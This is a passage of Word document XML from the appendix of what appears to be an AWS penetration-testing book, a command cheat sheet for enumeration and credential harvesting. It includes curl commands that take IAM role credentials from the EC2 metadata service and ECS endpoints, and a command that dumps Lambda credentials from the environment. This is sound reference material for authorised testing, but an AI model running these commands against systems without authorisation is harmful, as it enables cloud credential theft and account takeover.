          <w:numId w:val="56"/>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A live debrief produces more residual value than any written document; schedule one in the statement of work.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF081DA" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="2304" w:after="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="68"/>
          <w:szCs w:val="68"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="68"/>
          <w:szCs w:val="68"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Back Matter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B27418" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Appendices, Glossary, and References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011C85C7" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="part-blurb"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>The appendices consolidate reference material that is more useful at lookup time than in running prose: a command-by-command cheat sheet that maps the book's material to a single-page quick-reference (Appendix A), a consolidated catalogue of IAM privilege-escalation primitives for rapid recall (Appendix B), the CloudTrail events that matter for offensive and defensive work with their field semantics (Appendix C), and a practitioner's checklist that an operator can follow step-by-step on a new engagement (Ap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>pendix D). After the appendices, the glossary defines the AWS and offensive-security terminology used throughout, and the bibliography lists the primary sources — documentation, vendor blog posts, conference talks, and open-source tool repositories — that informed the text.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E44DA97" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Appendix A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:br/>
        <w:t>Command Cheat Sheet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7282AEA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single-page operator reference. The left column is the operational goal; the right column is the minimum command or command fragment that achieves it. Every command in this appendix appears in fuller form in the chapters referenced.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4260"/>
        <w:gridCol w:w="895"/>
      </w:tblGrid>
      <w:tr w:rsidR="00000000" w14:paraId="3F9A1C14" w14:textId="77777777">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:gridSpan w:val="3"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A72C271"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A.1 — Enumeration commands.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="633ADDB2" w14:textId="77777777">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1633F97E"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Goal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="62F72286"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Command</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3DF46105"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Chapter</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="27CA3A8B" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6457F08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Confirm identity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1CB40081" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>aws sts get-caller-identity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="40841FF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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="65ADE513" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14349FB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List all IAM users</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="41E10D2C" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>aws iam list-users</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="71C31FF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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="3247F91D" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B39F97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List all IAM roles</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A245C31" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>aws iam list-roles</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3FF1975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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="07B961B2" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E2CA7D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Simulate a principal's permissions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="622F1EC5" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>aws iam simulate-principal-policy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="44BC529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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="1D9E95D2" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6DE5A04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Broad recon</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1D42FA52" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>cloudfox aws all-checks --profile X</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D89E18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5, 18</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="5FD68C21" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="67E66A9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Pacu enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0D93D968" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>run iam__enum_permissions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C08273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5, 18</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="707C6D48" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="44CAABB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ScoutSuite audit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2E2ABAF7" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>scout aws --profile X</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="385358A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18</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="13D2C7A3" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="70795DF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Prowler compliance scan</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7B169B7A" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>prowler aws --profile X</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D5793E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18</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="2141EFEC" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1841783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 graph</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="22AD4161" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>pmapper graph create</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6BB1DB9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18</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="799DEFE5" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:vanish/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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7439"/>
        <w:gridCol w:w="895"/>
      </w:tblGrid>
      <w:tr w:rsidR="00000000" w14:paraId="697B205D" w14:textId="77777777">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:gridSpan w:val="3"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3B09291D"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A.2 — Credential harvesting.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="7B9EF859" w14:textId="77777777">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="33958007"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Goal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="095D6A22"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Command</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5FBD48CE"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Chapter</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="28A60352" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1CAA75A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IMDSv2 token</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5270634E" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>curl -X PUT -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" http://169.254.169.254/latest/api/token</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C9E86C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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="528231A6" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="03DA380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IMDSv2 creds</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65A368AF" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>curl -H "X-aws-ec2-metadata-token: $T" http://169.254.169.254/latest/meta-data/iam/security-credentials/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="48F3F81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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="594A074E" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="67B7813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ECS task creds</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="05E55255" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>curl 169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="49944C9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13</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="545C5184" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="080710C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Lambda creds</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="121A98A7" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>env | grep AWS_</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="215EFEA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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="30F3D282" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="74B010A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Git repo secrets</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="217C3030" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>trufflehog git file://. --only-verified</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3451609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6, 18</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="46602F0B" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14DF818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 bucket listing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5D7993CD" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>s3scanner scan -bucket X</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C28054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6, 18</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
